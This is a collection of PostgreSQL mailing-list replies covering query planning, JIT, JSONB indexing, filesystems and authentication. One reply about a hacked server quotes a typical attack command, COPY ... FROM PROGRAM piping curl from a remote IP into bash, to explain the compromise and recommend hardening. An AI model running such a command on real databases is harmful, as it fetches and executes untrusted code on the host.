Re: Conditional Tables in Postgres

2021-10-14 Thread Imre Samu
Hi Mubashir,

>  ... researching on using databases to implement network control
> infrastructure.  ...
>  Are there any postgres extensions/features that implement conditional
> tables?

Perhaps something like this:

https://dl.acm.org/doi/10.1145/3472716.3472848  "Sarasate: a strong
representation system for networking policies"
*"Policy information in computer networking today is hard to manage. This
is in sharp contrast to relational data structured in a database that
allows easy access. In this demonstration, we ask why cannot (or how can)
turn network policies into relational data. Our key observation is that
oftentimes a policy does not prescribe a single ``definite'' network state,
but rather is an ``incomplete'' description of all the legitimate network
states. Based on this idea, we adopt conditional tables and the usual SQL
interface (a relational structure developed for incomplete database) as a
means to represent and query sets of network states in exactly the same way
as a single definite network snapshot. More importantly, like relational
tables that improve data productivity and innovation, relational policies
allow us to extend a rich set of data mediating methods to address the
networking problem of coordinating policies in a distributed environment."*

As far as I can see, the source code is here:
https://github.com/ravel-net/Faure/blob/main/apps/README_sarasate.md
It is a [ PL/python3u extension + Z3 solver (Z3 API in Python) ] solution.
It could probably be reimplemented with
-  PL/Julia ( https://gitlab.com/pljulia/pljulia ) + the Z3 API in Julia (
https://github.com/ahumenberger/Z3.jl )

IMHO: if you have a favorite Python/R/Julia library in this area, you can
easily integrate it with PostgreSQL via a procedural-language function ( a sketch below ).
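
As a rough illustration (not Sarasate itself), a minimal sketch of calling a
Python solver library from SQL; it assumes the plpython3u extension and the
z3-solver Python package are installed on the server:

CREATE EXTENSION IF NOT EXISTS plpython3u;

CREATE FUNCTION z3_int_between(lo int, hi int) RETURNS boolean AS $$
  # toy constraint: is there an integer x with lo < x < hi ?
  from z3 import Int, Solver, sat
  x = Int('x')
  s = Solver()
  s.add(x > lo, x < hi)
  return s.check() == sat
$$ LANGUAGE plpython3u;

SELECT z3_int_between(5, 7);   -- true  (x = 6 satisfies the constraint)
SELECT z3_int_between(5, 6);   -- false (no integer strictly between 5 and 6)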

Regards,
  Imre


Mubashir Anwar  wrote (on Thu, Oct 14, 2021, 21:41):

>
> Hi!
>
> I am a PhD student, researching on using databases to implement network
> control infrastructure. For this purpose, I wanted to use conditional
> tables  in
> databases, which allow representing unknown values in a DB with conditions
> over tuples. However, I could not find any DBMS that supports them. Are
> there any postgres extensions/features that implement conditional tables? I
> wanted to confirm by asking here in case I missed something in my search.
>
> Thanks in advance!
>
> Best,
> Mubashir
>


Re: ZFS filesystem - supported ?

2021-10-26 Thread Imre Samu
> Phoronix has some very useful benchmarks:
>
> https://www.phoronix.com/scan.php?page=news_item&px=Linux-5.14-File-Systems
> Ext4 is much better than XFS with SQLite tests and almost equal with
> MariaDB test. PostgreSQL is a relational database (let's forget the
> object part for now) and the IO patterns will be similar to SQLite and
> MariaDB.

There is a link from the Phoronix page to the full OpenBenchmarking.org
result file, which includes multiple PostgreSQL 13 pgbench results:
https://openbenchmarking.org/result/2108260-PTS-SSDS978300&sor&ppt=D&oss=postgres
( XFS, F2FS, EXT4, BTRFS )

Regards,
 Imre


Mladen Gogala  wrote (on Wed, Oct 27, 2021, 1:42):

>
> On 10/26/21 05:35, Laura Smith wrote:
> > Curious, when it comes to "traditional" filesystems, why ext4 and not
> xfs ? AFAIK the legacy issues associated with xfs are long gone ?
>
> XFS is not being very actively developed any more. Ext4 is being
> actively developed and it has some features to help with SSD space
> allocation. Phoronix has some very useful benchmarks:
>
> https://www.phoronix.com/scan.php?page=news_item&px=Linux-5.14-File-Systems
>
> Ext4 is much better than XFS with SQLite tests and almost equal with
> MariaDB test. PostgreSQL is a relational database (let's forget the
> object part for now) and the IO patterns will be similar to SQLite and
> MariaDB. That benchmark is brand new, done on the kernel 5.14. Of
> course, the only guarantee is doing your own benchmark, with your own
> application.
>
> --
> Mladen Gogala
> Database Consultant
> Tel: (347) 321-1217
> https://dbwhisperer.wordpress.com
>
>
>
>


Re: Difference in execution plans pg12 vs pg14

2021-12-10 Thread Imre Samu
Hi Dmitry,

pg12:
> Execution Time: 44.123 ms

pg14:
> JIT:
>   Functions: 167
>   Options: Inlining true, Optimization true, Expressions true, Deforming
> true
>   Timing: Generation 9.468 ms, Inlining 55.237 ms, Optimization 507.548
> ms, Emission 347.932 ms, Total 920.185 ms
> Execution Time: 963.258 ms

Please check the JIT settings,
and test with  jit = off  ( a quick sketch below ):
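
A quick sketch of the check (standard GUC names; session-level only):

SELECT name, setting FROM pg_settings WHERE name LIKE 'jit%';   -- inspect the JIT settings

SET jit = off;    -- current session only; use ALTER SYSTEM SET jit = off; for the whole instance
-- ... then re-run EXPLAIN (ANALYZE, BUFFERS) on the slow statement and compare timings;
-- alternatively raise jit_above_cost so only really expensive plans get JIT-compiled.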

regards,
 Imre


Дмитрий Иванов  wrote (on Sat, Dec 11, 2021, 2:01):

> Afternoon. I was able to make the necessary changes to my base needed to
> migrate win_pg12 to debian pg14.
> But there is a new problem, which was not there at the initial stage so I
> checked:
>
> win_pg12:
> ->  Index Scan using index_class_tree_full on class c  (cost=0.28..2.50
> rows=1 width=235) (actual time=0.030..0.032 rows=1 loops=1)
>  Index Cond: (id = 650)
> debian_pg14:
> ->  Index Scan using index_class_tree_full on class c  (cost=0.28..2.50
> rows=1 width=235) (actual time=842.795..842.796 rows=1 loops=1)
>  Index Cond: (id = 650)
>
> I'm wondering where to dig next...
> --
> Best regards, Dmitry!
>


Re: Best Strategy for Large Number of Images

2021-12-20 Thread Imre Samu
> ... I have about 2 million images ...
> folder structure

The "Who's On First" gazetteer with ~ 26M geojson records - using 3-number
chunks subfolder structure.

"Given a Who's On First ID its (relative) URI can be derived by splitting
the ID in to 3-number chunks representing nested subdirectories, followed
by filename consisting of the ID followed by .geojson. For example the
ID for Montréal is 101736545 which becomes:   101/736/545/101736545.geojson"
https://whosonfirst.org/docs/uris/

It works, but it is not optimal either:

"As of this writing it remains clear that this approach (lots of tiny files
parented by lots of nested directories) can be problematic. We may be
forced to choose another approach, like fewer subdirectories but nothing
has been decided and anything we do will be backwards compatible." ( from
https://whosonfirst.org/data/principles/ )

By now the structure has been migrated to per-country repositories (
https://whosonfirst.org/blog/2019/05/09/changes/ ),
so the US structure is:
https://github.com/whosonfirst-data/whosonfirst-data-admin-us/tree/master/data
 or
https://github.com/whosonfirst-data/whosonfirst-data-admin-us/blob/master/data/907/132/693/907132693.geojson

Maybe you can adopt some of these ideas.
imho: with 3-number chunks representing nested subdirectories, each directory stays
small, so more file systems / hosting solutions remain an option ( see the sketch below ).
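
For illustration, a small SQL sketch of the 3-number-chunk path derivation
(the function name is made up for this example):

CREATE FUNCTION wof_rel_path(id bigint) RETURNS text AS $$
  SELECT string_agg(m[1], '/' ORDER BY ord) || '/' || id::text || '.geojson'
  FROM regexp_matches(id::text, '.{1,3}', 'g') WITH ORDINALITY AS t(m, ord);
$$ LANGUAGE sql IMMUTABLE;

SELECT wof_rel_path(101736545);   --> 101/736/545/101736545.geojson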

regards,
 Imre

Estevan Rech  wrote (on Mon, Dec 20, 2021, 11:30):

> How is this folder structure like 10,000 folders? and the backup of it,
> how long does it take?
>


Re: How to confirm the pg_hba.conf service is correctly working

2021-12-23 Thread Imre Samu
> Have checked  select * from pg_hba_file_rules results are consistent with
> pg_hba.conf
> any ip and user still can login in db

Is there any proxy or port/IP forwarding running in the background?

Next time, also check the "client_addr":
-  SELECT usename, client_addr FROM pg_stat_activity WHERE client_addr IS NOT NULL;


> a Postgres DB that was Hacked l
> When I remove pg  software and reinstall pg software

I agree with the others:
- please re-install the full system!  ( not just PostgreSQL! )

The usual attack sequence is:
 - open port, brute-force attack + COPY ... FROM PROGRAM 'curl
http://1xx.1x.7x.1/1.sh | bash';
so you can expect "anything" to be installed and running hidden in the background.

https://dev.to/sanchitsharma/investigation-into-postgres-malware-hack-2ai0  ( 2020. Mar )
https://brycematheson.io/how-to-permanently-kill-and-remove-kdevtmpfsi-kinsing/


> host   VJ   VJ_USER   10.10.10.1/32 md5

imho:
- use a non-default port
- change "md5" to "scram-sha-256" ( see the sketch below )
- maybe: add auth_delay: https://www.postgresql.org/docs/10/auth-delay.html
- for administration use SSH tunnels:
https://www.postgresql.org/docs/10/ssh-tunnels.html  ( and use a firewall
to close all external ports, or use SSL )
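
A hedged sketch of the md5 -> scram-sha-256 step (the role name is taken from your
pg_hba line; adjust the quoting/case to your actual role):

ALTER SYSTEM SET password_encryption = 'scram-sha-256';
SELECT pg_reload_conf();
ALTER ROLE "VJ_USER" PASSWORD 'choose-a-new-strong-password';  -- re-hashes the password with SCRAM
-- then replace "md5" with "scram-sha-256" in pg_hba.conf and reload again.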

 Regards,
   Imre


shing dong  wrote (on Thu, Dec 23, 2021, 11:15):

> Your original post stated that you only had
>> host   VJ   VJ_USER   10.10.10.1/32 md5
>> in the pg_hba.conf file.
>> However the result of the select is considerably more ?
>
>
>
> DEAR
>
> I  have tested this feature  ,  only had
>
> host   VJ   VJ_USER   10.10.10.1/32 md5
>
> in the pg_hba.conf file
>
> Have checked  select * from pg_hba_file_rules results are consistent with
> pg_hba.conf
>
> any ip and user still can login in db
>
> When I remove pg  software and reinstall pg software  ,  the function of
> pg_hba is working ,represent  that the location and content of
> pg_hba.conf are correct
>
> Suspect that the function of pg_hba  is destroyed?
>
>
>
>
>
>
>
>
>
>
> Dave Cramer  wrote (on Wed, Dec 22, 2021, 6:58 PM):
>
>>
>>
>> On Tue, 21 Dec 2021 at 22:57, shing dong  wrote:
>>
>>> *Dear  Dave *
>>>
>>> The result after reload is
>>>
>>> 2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19
>>> 13:41:35 -04,,0,LOG,0,"received SIGHUP, reloading configuration
>>> files",""
>>>
>>> No other error message
>>>
>>> --
>>>
>>> result of  select * from pg_hba_file_rules
>>>
>>>
>>>
>>> line_number,type,database,user_name,address,netmask,auth_method,options,error
>>> 84,local,{all},{all},,,md5,,
>>> 86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
>>> 87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
>>> 88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
>>> 89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,,
>>> 92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,,
>>> 93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
>>> 94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,,
>>>
>>> 95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
>>>
>>> 96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
>>> 99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
>>> 100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,,
>>> 101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,,
>>> 102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,,
>>> 103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,,
>>> 104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,,
>>> 105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,,
>>> 106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,,
>>> 107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,,
>>> 108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,,
>>> 109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,,
>>> 110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,,
>>> 111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,,
>>> 112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,,
>>> 113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,,
>>> 114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,,
>>> 115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,,
>>> 116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,,
>>> 117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,,
>>> 118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,,
>>> 119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,,
>>> 120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,,
>>> 121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,,
>>> 122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,,
>>> 12

Re: SELECT with LIKE clause makes full table scan

2022-01-26 Thread Imre Samu
> We face in a PostgreSQL 11.4 installation on a potent Linux host a
> ...
> Why is this (ignoring the Index) and what could be done?

IMHO: 11.4 is very old ( release date: 2019-06-20 ) and is missing a lot of
patches.
The latest patch release is 11.14 ( see
https://www.postgresql.org/docs/11/release.html ).

You can test PG 11.14 with the PostgreSQL docker image (
https://hub.docker.com/_/postgres ):
- docker pull postgres:11.14-bullseye
- import the table ( d01buch )
- create the indexes
- test your query

Regards,
 Imre

Matthias Apitz  wrote (on Wed, Jan 26, 2022, 11:55):

>
> Hello,
>
> We face in a PostgreSQL 11.4 installation on a potent Linux host a
> serious performance degree.
>
> A SELECT with a LIKE clause on a table with ca. 5.200.000 rows on a
> column with an Index ignores this and does a full table scan:
>
> sisis=# explain (analyze, buffers) select * from d01buch where d01ort like
> 'Z 9610%' ;
> QUERY PLAN
>
> ---
> Gather (cost=1000.00..680262.71 rows=510 width=952) (actual
> time=1324.096..1349.429 rows=1 loops=1)
> Workers Planned: 4
> Workers Launched: 4
> Buffers: shared hit=102040 read=560674
> -> Parallel Seq Scan on d01buch (cost=0.00..679211.71 rows=128 width=952)
> (actual time=1117.663..1315.062 rows=0 loops=5)
> Filter: (d01ort ~~ 'Z 9610%'::text)
> Rows Removed by Filter: 1055853
> Buffers: shared hit=102040 read=560674
> Planning Time: 2.028 ms
> Execution Time: 1349.593 ms
> (10 Zeilen)
>
> Why is this (ignoring the Index) and what could be done?
>
> Thanks
>
> matthias
>
>
> --
> Matthias Apitz, ✉ g...@unixarea.de, http://www.unixarea.de/
> +49-176-38902045
> Public GnuPG key: http://www.unixarea.de/key.pub
>
>
>


Re: increasing effective_cache_size slows down join queries by a factor of 4000x

2022-02-02 Thread Imre Samu
> Question: are there other ways to give PostgreSQL a hint

What is your PG version?

Maybe try the pg_hint_plan extension ( https://github.com/ossc-db/pg_hint_plan ):
"pg_hint_plan makes it possible to tweak PostgreSQL execution plans using
so-called "hints" in SQL comments, like /*+ SeqScan(a) */."

regards,
 Imre



Artyom Shaposhnikov  wrote (on Wed, Feb 2, 2022, 20:05):

> I recently moved a postgres DB to a more powerful server with 1TB of
> RAM instead of 64GB before. To my surprise after running the tuning on
> the new server, the performance of joins deteriorated by 4000x
> compared to the old server. I carefully examined all of the changes
> and found the culprit:
>
> if I use the effective_cache_size > 25GB, the query plan used is this:
>
> Limit (cost=124.12..590.33 rows=1000 width=205) (actual
> time=42326.662..42336.212 rows=1000 loops=1)
> -> Nested Loop (cost=124.12..31909018.46 rows=68443040 width=205)
> (actual time=42326.660..42336.127 rows=1000 loops=1)
> -> Merge Join (cost=124.12..30710356.97 rows=68443040 width=169)
> (actual time=42326.613..42332.764 rows=1000 loops=1)
> Merge Cond: (d.id = dc.data_id)
> -> Nested Loop (cost=1.00..31036282.72 rows=58785023 width=165)
> (actual time=0.042..5.533 rows=854 loops=1)
> -> Index Scan using data_pkey on data t (cost=0.57..4787030.00
> rows=58785023 width=131) (actual time=0.023..0.526 rows=854 loops=1)
> Index Cond: (id > 205284974)
> -> Index Scan using user_pkey on data_user u (cost=0.43..0.45 rows=1
> width=42) (actual time=0.005..0.005 rows=1 loops=854)
> Index Cond: (id = d.user_id)
> -> Index Only Scan using data_class_pkey on data_class ta
> (cost=0.57..4935483.78 rows=216964862 width=8) (actual
> time=0.018..35022.908 rows=151321889 loops=1)
> Heap Fetches: 151321889
> -> Index Scan using class_id_index on class a (cost=0.00..0.02 rows=1
> width=44) (actual time=0.003..0.003 rows=1 loops=1000)
> Index Cond: (id = dc.class_id)
> Planning Time: 4.114 ms
> Execution Time: 42336.397 ms
>
> and it is 4000x slower than the query plan used with the lower
> effective_cache_size that uses indexes instead of the merge joins:
>
> Limit (cost=1.57..4832.30 rows=1000 width=205) (actual
> time=0.081..10.457 rows=1000 loops=1)
> -> Nested Loop (cost=1.57..330629805.46 rows=68443040 width=205)
> (actual time=0.080..10.378 rows=1000 loops=1)
> -> Nested Loop (cost=1.57..267793481.39 rows=68443040 width=169)
> (actual time=0.065..7.496 rows=1000 loops=1)
> -> Nested Loop (cost=1.00..100917823.18 rows=58785023 width=165)
> (actual time=0.040..5.424 rows=854 loops=1)
> -> Index Scan using data_pkey on data t (cost=0.57..21427806.53
> rows=58785023 width=131) (actual time=0.024..0.482 rows=854 loops=1)
> Index Cond: (id > 205284974)
> -> Index Scan using user_pkey on data_user u (cost=0.43..1.35 rows=1
> width=42) (actual time=0.005..0.005 rows=1 loops=854)
> Index Cond: (id = d.user_id)
> -> Index Only Scan using data_class_pkey on data_class ta
> (cost=0.57..2.80 rows=4 width=8) (actual time=0.002..0.002 rows=1
> loops=854)
> Index Cond: (data_id = d.id)
> Heap Fetches: 1000
> -> Index Scan using class_id_index on class a (cost=0.00..0.92 rows=1
> width=44) (actual time=0.002..0.002 rows=1 loops=1000)
> Index Cond: (id = dc.class_id)
> Planning Time: 5.074 ms
> Execution Time: 10.614 ms
>
> query:
>
> explain analyze select d.time as time,d.id as id, u.username as
> username, a.query_symbol as query_symbol from data as d, data_user as
> u, class as a, data_class as dc
>where dc.class_id = a.id and dc.data_id = d.id and d.user_id = u.id
> and d.id > 205284974
>  order by d.id
>  limit 1000;
>
> I found a way to fix it by creating a distinct statistics on the
> largest join table:
>
> create statistics stat_data_class (ndistinct) on data_id, class_id
> from data_class;
> analyze data_class;
>
> Question: are there other ways to give PostgreSQL a hint to use the
> indexes instead of the merge join plan without artificially lowering
> the memory available in the parameter effective_cache_size or creating
> the additional statistics on the table?
>
> Thank you,
>
> -Art
>
>
>


Re: Can we go beyond the standard to make Postgres radically better?

2022-02-11 Thread Imre Samu
> Give me a couple million bucks, and I’ll hire some of the Postgres devs
> to build a new database.
> We could crib some of the low-level code from Postgres, but everything
> above the low level would need to be rewritten.

You can check the EdgeDB experiments: https://www.edgedb.com/
"What is EdgeDB? EdgeDB is a new kind of database that takes the best
parts of relational databases, graph databases, and ORMs. We call it a
graph-relational database."
"EdgeDB uses PostgreSQL as its data storage and query execution engine,
benefitting from its exceptional reliability."
-  (2022) https://www.edgedb.com/blog/edgedb-1-0
-  (2019) We Can Do Better Than SQL:
https://www.edgedb.com/blog/we-can-do-better-than-sql
"The questions we often hear are “Why create a new query language?” and
“What’s wrong with SQL?”. This post contains answers to both. ... "
- EdgeQL:   https://www.edgedb.com/docs/edgeql/index   "EdgeQL is a
spiritual successor to SQL designed with a few core principles in mind."
- GraphQL:  https://www.edgedb.com/docs/graphql/index   EdgeDB supports
GraphQL queries natively out of the box.
- Github: https://github.com/edgedb/edgedb

EdgeQL example from the blog:

select
  Movie {
    title,
    rating := math::mean(.ratings.score),
    actors: {
      name
    } order by @credits_order
      limit 5,
  }
filter
  "Zendaya" in .actors.name


Regards,
 Imre



Guyren Howe  wrote (on Fri, Feb 11, 2022, 7:43):

> I get all this. Give me a couple million bucks, and I’ll hire some of the
> Postgres devs to build a new database. We could crib some of the low-level
> code from Postgres, but everything above the low level would need to be
> rewritten.
>
> I was proposing more that we at least provide higher-level, more general,
> orthogonal etc features in the SQL we have now. eg first-class functions
> could be added to SQL reasonably easily.
> On Feb 10, 2022, 22:32 -0800, Tom Lane , wrote:
>
> Raymond Brinzer  writes:
>
> Will it be accepted here? I don't know; I'm not an insider, or in a
> position to say. But it'd be a much better pitch than a pep talk, or
> speaking in generalities about SQL. And that's coming from someone who
> actually agrees with you. I'm 100% on board with the idea that something
> better is (badly) needed. But is the idea, here, really to talk a highly
> successful project into doing a 180 based on this sort of argument? If
> only the people writing the code saw the light, they'd go read the Datomic
> site, and start overhauling PostgreSQL?
>
>
> Nah, probably not. I mean, not only are we implementing SQL, but
> we're implementing it in C. I used better languages than C back
> in the seventies ... but here we are. Practical acceptance is
> all about infrastructure and compatible tooling, which SQL and C
> both have in spades, while academic designs really don't.
>
> Also, I fear this discussion underestimates the difficulty of
> putting some other query language on top of Postgres. I know
> you'll say "but the Berkeley guys pasted SQL onto a QUEL engine
> back when, so how hard can it be?" In the first place, that
> was done on top of maybe ten years worth of work, but now there's
> another twenty-five years of development agglomerated on top of
> that. So moving things would be more than 3X harder, even if
> you make the very-naive assumption that the difficulty is merely
> linear. In the second place, QUEL and SQL aren't that far apart
> conceptually, and yet we've still had lots of problems that can
> be traced to their incompatibilities. Something that was really
> different from SQL would be a nightmare to embed into PG. I'll
> just point out one example: if you don't like SQL's semantics for
> NULL (which no I don't much like either), changing that would
> probably require touching tens of thousands of lines of code just
> in the PG core, never mind breaking every API used by extensions.
>
> So for better or worse, Postgres is a SQL engine now. If you
> want Datalog or $other_language, you'd be better off starting
> or contributing to some other project.
>
> That's not to say that we can't do stuff around the margins.
> The idea of "select all columns except these", for instance,
> has been discussed quite a bit, and would probably happen if
> we could get consensus on the syntax. But we're not going to
> throw away thirty-five years' worth of work to chase some
> blue-sky ideas.
>
> regards, tom lane
>
>


Re: Is it possible to index "deep" into a JSONB column?

2022-05-30 Thread Imre Samu
Hi Shaheed,

> WHAT GOES HERE

imho, check:   jsonb_path_query_array( jsonb_col, '$.employee.*.date_of_birth' )

My example:

CREATE TABLE jsonb_table (
id serial primary key,
jsonb_col JSONB
);

INSERT INTO jsonb_table(jsonb_col)
VALUES
  ('{"stuff": {},"employee": {"8011":  {"date_of_birth":
"1980-01-01"},"8222": {"date_of_birth": "1982-02-02"}}}'),
  ('{"stuff": {},"employee": {"7011":  {"date_of_birth":
"1970-01-01"},"7122": {"date_of_birth": "1971-02-02"}}}'),
  ('{"stuff": {},"employee": {"a12":   {"date_of_birth":
"2000-01-01"},"b56":  {"date_of_birth": "2000-02-02"}}}')
;

select jsonb_path_query_array( jsonb_col, '$.employee.*.date_of_birth' )
 from jsonb_table;

-- create index
create index jpqarr_idx
  on jsonb_table
  using gin ( jsonb_path_query_array( jsonb_col,
'$.employee.*.date_of_birth' ) );
-- tests:
select id from jsonb_table
  where jsonb_path_query_array( jsonb_col, '$.employee.*.date_of_birth') @>
to_jsonb('2000-01-01'::TEXT);
;
DROP TABLE
CREATE TABLE
INSERT 0 3
+------------------------------+
|    jsonb_path_query_array    |
+------------------------------+
| ["1980-01-01", "1982-02-02"] |
| ["1970-01-01", "1971-02-02"] |
| ["2000-01-01", "2000-02-02"] |
+------------------------------+
(3 rows)

CREATE INDEX
+----+
| id |
+----+
|  3 |
+----+
(1 row)


Regards,
 Imre

Shaheed Haque  wrote (on Sun, May 29, 2022, 22:53):

> Suppose I have a JSONB field called "snapshot". I can create a GIN
> index on it like this:
>
>   create index idx1 on mytable using gin (snapshot);
>
> In principle, I believe this allows index-assisted access to keys and
> values nested in arrays and inner objects but in practice, it seems
> the planner "often" decides to ignore the index in favour of a table
> scan. (As discussed elsewhere, this is influenced by the number of
> rows, and possibly other criteria too).
>
> Now, I know it is possible to index inner objects, so that is snapshot
> looks like this:
>
> {
> "stuff": {},
> "more other stuff": {},
> "employee": {
>  "1234": {"date_of_birth": "1970-01-01"},
>  "56B789": {"date_of_birth": "1971-02-02"},
> }
> }
>
> I can say:
>
>   create index idx2 on mytable using gin ((snapshot -> 'employee'));
>
> But what is the syntax to index only on date_of_birth? I assume a
> btree would work since it is a primitive value, but WHAT GOES HERE in
> this:
>
>   create index idx3 on mytable using btree ((snapshot ->'employee' ->
> WHAT GOES HERE -> 'date_of_birth'));
>
> I believe an asterisk "*" would work if 'employee' was an array, but
> here it is  nested object with keys. If it helps, the keys are
> invariably numbers (in quoted string form, as per JSON).
>
> Thanks, Shaheed
>
>
>


Re: Is it possible to index "deep" into a JSONB column?

2022-05-30 Thread Imre Samu
> In principle, I believe this allows index-assisted access to keys and
> values nested in arrays and inner objects but in practice, it seems
> the planner "often" decides to ignore the index in favour of a table
> scan.

Part II: index usage; see the "Bitmap Index Scan on jpqarr_idx" below.

SET enable_seqscan = OFF;
select * from jsonb_table
  where jsonb_path_query_array( jsonb_col, '$.employee.*.date_of_birth') @>
to_jsonb('1971-02-02'::TEXT);
;
+----+----------------------------------------------------------------------------------------------------------------+
| id |                                                   jsonb_col                                                   |
+----+----------------------------------------------------------------------------------------------------------------+
|  2 | {"stuff": {}, "employee": {"7011": {"date_of_birth": "1970-01-01"}, "7122": {"date_of_birth": "1971-02-02"}}} |
+----+----------------------------------------------------------------------------------------------------------------+
(1 row)


EXPLAIN ANALYZE select * from jsonb_table
  where jsonb_path_query_array( jsonb_col, '$.employee.*.date_of_birth') @>
to_jsonb('1971-02-02'::TEXT);

                                    QUERY PLAN
--------------------------------------------------------------------------------------
 Bitmap Heap Scan on jsonb_table  (cost=3.00..4.52 rows=1 width=36) (actual time=0.056..0.059 rows=1 loops=1)
   Recheck Cond: (jsonb_path_query_array(jsonb_col, '$."employee".*."date_of_birth"'::jsonpath, '{}'::jsonb, false) @> to_jsonb('1971-02-02'::text))
   Heap Blocks: exact=1
   ->  Bitmap Index Scan on jpqarr_idx  (cost=0.00..3.00 rows=1 width=0) (actual time=0.026..0.027 rows=1 loops=1)
         Index Cond: (jsonb_path_query_array(jsonb_col, '$."employee".*."date_of_birth"'::jsonpath, '{}'::jsonb, false) @> to_jsonb('1971-02-02'::text))
 Planning Time: 0.255 ms
 Execution Time: 0.122 ms
(7 rows)

regards,
  Imre


Imre Samu  wrote (on Mon, May 30, 2022, 12:30):

> Hi Shaheed,
>
> > WHAT GOES HERE
>
> imho check the:   *jsonb_path_query_array( jsonb_col,
> '$.employee.*.date_of_birth' ) *
>
> may example:
>
> CREATE TABLE jsonb_table (
> id serial primary key,
> jsonb_col JSONB
> );
>
> INSERT INTO jsonb_table(jsonb_col)
> VALUES
>   ('{"stuff": {},"employee": {"8011":  {"date_of_birth":
> "1980-01-01"},"8222": {"date_of_birth": "1982-02-02"}}}'),
>   ('{"stuff": {},"employee": {"7011":  {"date_of_birth":
> "1970-01-01"},"7122": {"date_of_birth": "1971-02-02"}}}'),
>   ('{"stuff": {},"employee": {"a12":   {"date_of_birth":
> "2000-01-01"},"b56":  {"date_of_birth": "2000-02-02"}}}')
> ;
>
> select jsonb_path_query_array( jsonb_col, '$.employee.*.date_of_birth' )
>  from jsonb_table;
>
> -- create index
> create index jpqarr_idx
>   on jsonb_table
>   using gin ( jsonb_path_query_array( jsonb_col,
> '$.employee.*.date_of_birth' ) );
> -- tests:
> select id from jsonb_table
>   where jsonb_path_query_array( jsonb_col, '$.employee.*.date_of_birth')
> @> to_jsonb('2000-01-01'::TEXT);
> ;
> DROP TABLE
> CREATE TABLE
> INSERT 0 3
> +--+
> |jsonb_path_query_array|
> +--+
> | ["1980-01-01", "1982-02-02"] |
> | ["1970-01-01", "1971-02-02"] |
> | ["2000-01-01", "2000-02-02"] |
> +--+
> (3 rows)
>
> CREATE INDEX
> ++
> | id |
> ++
> |  3 |
> ++
> (1 row)
>
>
> Regards,
>  Imre
>
> Shaheed Haque  wrote (on Sun, May 29, 2022, 22:53):
>
>> Suppose I have a JSONB field called "snapshot". I can create a GIN
>> index on it like this:
>>
>>   create index idx1 on mytable using gin (snapshot);
>>
>> In principl

Re: PostgreSQL 12.2 on Linux ubuntu 20.4 / s390

2022-06-15 Thread Imre Samu
> According to the apt list for PostgreSQL there is nothing for the s390
> system for version 13 and 14.

Multiple postgres docker images exist for "OS/ARCH=linux/s390x":
- "postgres:14.3-bullseye"        ( debian )
- "postgres:15beta1-bullseye"     ( debian )
- "postgres:15beta1-alpine3.16"   ( alpine )
- "postgres:13.7-alpine3.16"      ( alpine )
- etc.
Maybe useful for testing on linux/s390x.
( https://hub.docker.com/_/postgres?tab=tags )

regards,
 Imre


Ian Dauncey  wrote (on Wed, Jun 15, 2022, 12:59):

> According to the apt list for PostgreSQL there is nothing for the s390
> system for version 13 and 14.
>
>
>
> # sudo apt list postgresql-14 -a
>
> Listing... Done
>
>
>
> # sudo apt list postgresql-13 -a
>
> Listing... Done
>
>
>
> But for version 12 there is
>
>
>
> # sudo apt list postgresql-12 -a
>
> Listing... Done
>
> postgresql-12/focal-updates,focal-security,now 12.11-0ubuntu0.20.04.1
> s390x [installed]
>
> postgresql-12/focal 12.2-4 s390x
>
>
>
> Regards
>
> Ian
>
>
>
> *From:* Ray O'Donnell 
> *Sent:* Wednesday, 15 June 2022 10:12
> *To:* Ian Dauncey ;
> pgsql-general@lists.postgresql.org
> *Subject:* Re: PostgreSQL 12.2 on Linux ubuntu 20.4 / s390
>
>
>
> External email - treat with caution
>
> On 15 June 2022 08:31:42 Ian Dauncey  wrote:
>
> Morning all
>
>
>
> Currently we are running PostgreSQL 12.2 on Ubuntu 20.04.1 LTS (Kernel:
> Linux 5.4.0-42-generic - Architecture: s390x).
>
>
>
> We are looking at upgrading to a later version of PostgreSQL
>
>
>
> My question is :- What is the latest available version of PostgreSQL that
> will run on the above Architecture.
>
>
>
> Here you go:
>
>
>
> https://wiki.postgresql.org/wiki/Apt
>
>
>
> Ray.
>
>
>
>
>
>
>
>
>
>
>
> Regards
>
> Ian
>
>
>
> *Disclaimer*
>
> The information contained in this communication from the sender is
> confidential. It is intended solely for use by the recipient and others
> authorized to receive it. If you are not the recipient, you are hereby
> notified that any disclosure, copying, distribution or taking action in
> relation of the contents of this information is strictly prohibited and may
> be unlawful.
>
> This email has been scanned for viruses and malware, and may have been
> automatically archived by Mimecast, a leader in email security and cyber
> resilience. Mimecast integrates email defenses with brand protection,
> security awareness training, web security, compliance and other essential
> capabilities. Mimecast helps protect large and small organizations from
